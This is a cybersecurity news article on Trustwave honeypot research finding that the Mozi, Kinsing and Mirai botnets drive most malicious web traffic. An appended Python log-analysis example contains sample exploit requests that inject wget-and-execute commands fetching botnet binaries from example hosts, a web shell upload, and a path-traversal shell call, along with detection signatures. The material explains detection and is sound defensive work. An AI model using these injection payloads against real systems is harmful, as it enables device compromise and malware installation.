Cyber Defense Advisors

Botnets responsible for over 95% malicious web traffic globally: Report

Botnets are globally responsible for over 95% of malicious web traffic, according to research conducted by managed cybersecurity provider Trustwave.

For the research, Trustwave implemented a network of honeypots located in multiple countries including Russia, Ukraine, Poland, the UK, China, and the United States.

“By distributing honeypots in such a manner, we can gather a reliable set of information on the methods and techniques used by attackers and their botnets, allowing a comprehensive understanding of the current database threat landscape,” Trustwave said in the research.

The honeypots also let Trustwave observe in-the-wild exploitation of several enterprise products, including Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian Bitbucket, and F5 BIG-IP, within days of proof-of-concept (PoC) exploit code being published for each.

Most malicious traffic was from botnets

Over the six-month study period ending May 2023, the researchers analyzed traffic from 38,000 unique IP addresses and retrieved a little over 1,100 payloads served in exploitation attempts.

“Almost 19% of the total recorded web traffic was malicious, and botnets were responsible for over 95% of the malicious web traffic detected,” the report said.

The primary objective of these botnet attacks was to upload a web shell, a malicious script that gives the attacker remote command execution on a compromised website or server, so that further actions could be taken against Trustwave's honeypots, which posed as potential victims.

Mozi, Kinsing, and Mirai led the offensive

Further analysis attributed almost all (95%) of these exploitation attempts to three botnets: Mozi, Kinsing, and Mirai. Mozi alone accounted for 73% of the botnet-attributed attempts, with Kinsing at 13% and Mirai at 9%.

“These malware families are mostly known to explore vulnerabilities in internet-connected devices and assemble them into botnets used to either carry out distributed denial of service (DDoS) attacks, or mine cryptocurrencies,” the report said.

Mozi and Mirai both exploited vulnerabilities in IoT devices, including Netgear routers, MVPower DVRs, D-Link routers, and devices built on the Realtek SDK. Kinsing, by contrast, attempted to install the XMRig cryptocurrency miner on Linux systems by exploiting vulnerabilities in Apache HTTP Server, PHPUnit, ThinkCMF, and ThinkPHP, among others. “Due to the manner in which our honeypots were implemented, we were unable to scrutinize the subsequent actions that the attackers might have taken,” the report said.
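As an added illustration of the kind of classification behind the figures above (editor's example, not code from Trustwave's report), the script below takes constructed honeypot access-log lines, flags exploitation attempts against the product families the report names as well as web shell uploads, attributes requests to a botnet family by the payload name the injected command fetches, and then computes the malicious share of traffic, the botnet share of malicious traffic, and the per-family breakdown. The exploit-path signatures, the family markers, the per-IP attribution and the sample log lines are all assumptions of this example; the report does not publish its detection or attribution logic.

```python
import re
from collections import Counter
from urllib.parse import unquote

# "combined" access-log line: ip ident user [ts] "METHOD PATH PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Exploit-path signatures: editor's assumptions for the product families the report
# names (the report itself does not publish request paths). Matched on the raw path.
EXPLOIT_SIGNATURES = {
    "phpunit eval-stdin": re.compile(r"/vendor/phpunit/phpunit/src/util/php/eval-stdin\.php", re.I),
    "thinkphp invokefunction": re.compile(r"/index\.php\?s=/.*invokefunction", re.I),
    "apache cgi-bin traversal": re.compile(r"/cgi-bin/(?:\.%2e|%2e%2e|\.\.)/", re.I),
    "netgear setup.cgi syscmd": re.compile(r"/setup\.cgi\?.*todo=syscmd", re.I),
    "mvpower dvr shell": re.compile(r"^/shell\?", re.I),
    "d-link hnap": re.compile(r"/hnap1/", re.I),
    "realtek sdk miniigd": re.compile(r"/(?:picsdesc|wanipcn)\.xml", re.I),
}

# Family attribution by the binary the injected command downloads (editor's heuristic,
# not the report's method). Attribution is kept per source IP, so a later request from
# the same IP that carries no marker (e.g. a POST whose body is not logged) inherits it.
FAMILY_MARKERS = {
    "Mozi": re.compile(r"\bmozi\.[a-z]", re.I),
    "Kinsing": re.compile(r"kinsing", re.I),
    "Mirai": re.compile(r"mirai", re.I),
}

# Web shell activity: a PUT of a server-side script, or a request to one with cmd= (heuristic).
SCRIPT_RE = re.compile(r"\.(?:php\d?|jsp|aspx?)(?:\?|$)", re.I)


def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_exploit(path):
    return next((name for name, rx in EXPLOIT_SIGNATURES.items() if rx.search(path)), None)


def is_webshell(method, path):
    return bool(SCRIPT_RE.search(path)) and (method == "PUT" or "cmd=" in path.lower())


def family_marker(path):
    decoded = unquote(path)  # markers may be percent-encoded inside the query string
    return next((fam for fam, rx in FAMILY_MARKERS.items() if rx.search(decoded)), None)


def analyze(lines):
    reqs = [r for r in map(parse, lines) if r]
    ip_family = {}
    for r in reqs:  # pass 1: learn a family per source IP from any request that names a payload
        fam = family_marker(r["path"])
        if fam:
            ip_family.setdefault(r["ip"], fam)
    events = []
    for r in reqs:  # pass 2: flag malicious requests and attach the IP's family, if known
        sig, shell = detect_exploit(r["path"]), is_webshell(r["method"], r["path"])
        if sig or shell:
            events.append({"ip": r["ip"], "signature": sig or "web shell",
                           "webshell": shell, "family": ip_family.get(r["ip"])})
    attributed = [e for e in events if e["family"]]
    total, malicious = len(reqs), len(events)
    return {
        "total_requests": total,
        "unique_ips": len({r["ip"] for r in reqs}),
        "malicious": malicious,
        "malicious_pct": round(100 * malicious / total, 1) if total else 0.0,
        "botnet_pct_of_malicious": round(100 * len(attributed) / malicious, 1) if malicious else 0.0,
        "families": Counter(e["family"] for e in attributed),
        "webshell_attempts": sum(e["webshell"] for e in events),
        "unattributed": [e["signature"] for e in events if not e["family"]],
    }


SAMPLE_LOG = [  # constructed lines; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges
    '198.51.100.1 - - [10/May/2023:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/May/2023:10:00:05 +0000] "GET /robots.txt HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
    '198.51.100.1 - - [10/May/2023:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [10/May/2023:10:01:00 +0000] "GET /favicon.ico HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/May/2023:10:02:00 +0000] "GET /index.php?s=/Index/%5Cthink%5Capp/invokefunction'
    '&function=call_user_func_array&vars[0]=system&vars[1]=wget%20http://203.0.113.9/kinsing HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '203.0.113.5 - - [10/May/2023:10:02:03 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/May/2023:10:03:00 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://203.0.113.7:44587/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/ HTTP/1.0" 404 0 "-" "Wget/1.20.3"',
    '203.0.113.7 - - [10/May/2023:10:03:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://203.0.113.7:44587/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "-" "Wget/1.20.3"',
    '203.0.113.11 - - [10/May/2023:10:04:00 +0000] "GET /shell?cd+/tmp;wget+http://203.0.113.8/mirai.arm7;chmod+777+mirai.arm7;./mirai.arm7 HTTP/1.1" 404 0 "-" "Wget/1.20.3"',
    '203.0.113.12 - - [10/May/2023:10:05:00 +0000] "POST /picsdesc.xml HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.13 - - [10/May/2023:10:06:00 +0000] "PUT /uploads/c.php HTTP/1.1" 201 0 "-" "python-requests/2.28.1"',
    '203.0.113.13 - - [10/May/2023:10:06:01 +0000] "GET /uploads/c.php?cmd=id HTTP/1.1" 200 43 "-" "python-requests/2.28.1"',
    '203.0.113.14 - - [10/May/2023:10:07:00 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 0 "-" "-"',
]

SUMMARY = analyze(SAMPLE_LOG)

if __name__ == "__main__":
    for key, value in SUMMARY.items():
        print(f"{key}: {value}")
```

On the constructed sample this reports 9 of 13 requests as malicious, 5 of those 9 attributed to a family (Kinsing 2, Mozi 2, Mirai 1) and two web shell events. The four unattributed events show the limitation the report itself notes: a POST whose body is not logged, or a dropped web shell, carries no family marker unless the same source IP revealed one elsewhere. In practice attribution leans on fingerprinting the downloaded payloads (the report retrieved about 1,100 of them) rather than on URL strings alone, and the signature table here should be treated as a starting point, not a complete ruleset.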
